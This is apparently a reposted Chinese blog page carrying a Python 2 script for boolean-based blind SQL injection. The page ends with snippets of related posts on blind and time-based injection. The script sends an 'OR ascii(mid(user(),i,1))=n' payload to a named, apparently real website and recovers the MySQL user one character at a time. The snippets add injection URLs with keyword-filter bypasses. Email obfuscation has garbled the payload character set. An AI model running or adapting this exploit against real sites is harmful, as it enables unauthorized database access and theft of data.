盲注脚本2.基于bool

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {
    ‘User-Agent‘: ‘Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1‘,
}

payloads = list(‘[email protected]_.‘)

print ‘start to retrive MySQL user:‘
user = ‘‘
for i in range(1,15,1):
    for payload in payloads:

        conn = httplib.HTTPConnection(‘lbj.cikuu.com‘, timeout=60)
        s = "ascii(mid((user()),%s,1))=%s" % (i, ord(payload))

        conn.request(method=‘GET‘,
                     url="/index.php?a=arcon&id=-1 OR " + s + "&m=Index",

                     headers = headers)
        html_doc = conn.getresponse().read()
        conn.close()

        if html_doc.find(‘2014‘) > 0:
            user += payload
            sys.stdout.write(‘\r[In progress] %s‘ % user)
            sys.stdout.flush()
            break
        else:
            print ‘.‘,

print ‘\n[Done]MySQL user is‘, user

  

原文地址:https://www.cnblogs.com/nul1/p/8537202.html

时间: 2024-10-08 22:44:59

盲注脚本2.基于bool的相关文章

WEB安全 ACCESS 注入、盲注脚本

http://www.xxx.cn/cp.asp?classid=3http://www.xxx.cn/cp.asp?classid=3 and //有拦截关键字http://www.xxx.cn/cp.asp?classid=3 AND 1=1 //大写绕过http://www.xxx.cn/cp.asp?classid=3 AND 1=2http://www.xxx.cn/cp.asp?classid=3 ORDER BY 8%16 //正常http://www.xxx.cn/cp.asp?

时间盲注脚本.py

时间盲注脚本 #encoding=utf-8 import httplib import time import string import sys import random import urllib headers = {} payloads = '[email protected]_.ABCDEFGHIJKLMNOPQRST' print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localt

MOCTF 简单注入,记录一下盲注脚本

最近在练习sql注入写脚本,记录一下思路,刚学的and 1=1也拿出来溜溜 http://119.23.73.3:5004/?id=1 首先,没有被过滤是正常显示. 没有被过滤但是查询不到就是空白,比如?id=99999 waf过滤关键词,提示whatfuck ① 我首先判断的是有没有用trim()函数,要知道trim函数和过滤是不一样的. 区别很简单,举个例子.trim默认移除字符串左右两边的空格 http://119.23.73.3:5004/?id=1(此处1后边有空格) 如果使用了tri

实验吧CTF who are you?基于时间盲注

这是我第三次接触时间盲注,所以就写一个博文和大家分享一下,还能检验我对知识的掌握程度.?( ′???` ) 点开网址是把你的真实IP地址打印出来!然后立马看网页源代码什么发现都没有! 现在还没有什么想法,用burpsuite抓一下,看看能不能有什么发现 没有什么发现,但是当我们回想打开网页爆出我们的真实ip地址,既然是我们的真实ip,那么在后端应该调用了类似$_SERVER['HTTP_X_FORWARDED_FOR']之类的函数得到我们的真实ip地址.那么我们就用bp来构造一个含有x-forw

MYSQL注入天书之盲注讲解

Background-2 盲注的讲解 何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面.此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注.从background-1中,我们可以知道盲注分为三类 ?基于布尔SQL盲注 ?基于时间的SQL盲注 ?基于报错的SQL盲注 Ps:知识点太多了,这里只能简单列出来大致讲解一下.(ps:每当看到前辈的奇淫技巧的payload时,能想象到我内心的喜悦么?我真的想细细的写写这一块,但是不知道该怎么写或者小伙伴

实验吧之【who are you?】(时间盲注)补充

第二种方法 使用brup进行盲注  也是一个道理 不多贴了 这里提一下  burp怎么判断超时 Options->Connections->Tiimeouts->Normal这一空 改成你想要的超时时间(默认为120秒). 在进行Intruder攻击时,如果连接超时,则状态码和length一栏为空.由此可以判断连接是否超时. 需要注意的是:在开始Intruder攻击前,需要把Intruder->Options->Request Engine->Number of thr

注入学习(3) Mysql+php注入 基于bool和时间的盲注

练习三:Mysql+php 基于bool和时间的盲注 今天要用的函数(详细的直接看链接): left()函数:left()得到字符串左部指定个数的字符 left( string, n ) #string为要截取的字符串,n为长度 limit()函数:标准定义找百度 limit(a,b)  #我的理解 从第a个位置,截取b个数据 if语句/if()函数:在MySQL中语法如下 if(a,b,c)  #如果a为真,则if()函数执行b语句; 否则if()函数执行c语句; sleep()函数:函数代码

sqli-labs-master-Less-5 基于报错盲注/双注入

先从老套路开始-- ?id=1无报错,?id=1' 发现有报错!根据返回的语法错误可以判断是字符型 再然后可以判断出列数:?id=1' order by 3%23 然后按照套路,下一步应该是联合查询,可惜没有回显,这条路到这儿已经走到头了. 但是!但是!我们可以看看我们还有什么:1.语法错误仍然会显示出来2.You are in...的存在与否仍然可以帮助我们判断查询是否有正确 基于以上两点,就有了两种注入方式: 1.双注入(只要能回显语法错误,这种方式仍可使用,这种方式也是作者想考察的注入方式

Python:SQLMap源码精读之基于时间的盲注(time-based blind)

基于时间的盲注(time-based blind) 测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以确认.这可能源于多种原因,但主要是因为Web应用未显示任何错误,因而无法检索任何数据. 对于这种情况,要想识别漏洞,向数据库注入时间延迟并检查服务器响应是否也已经延迟会很有帮助.时间延迟是一种很强大的技术,Web服务器虽然可以隐藏错误或数据,但必须等待数据库返回结果,因此可用它来确认是否存在SQL注入.该技术尤其适合盲注. 源码解释 代码位置:在checkSqlInjection函数中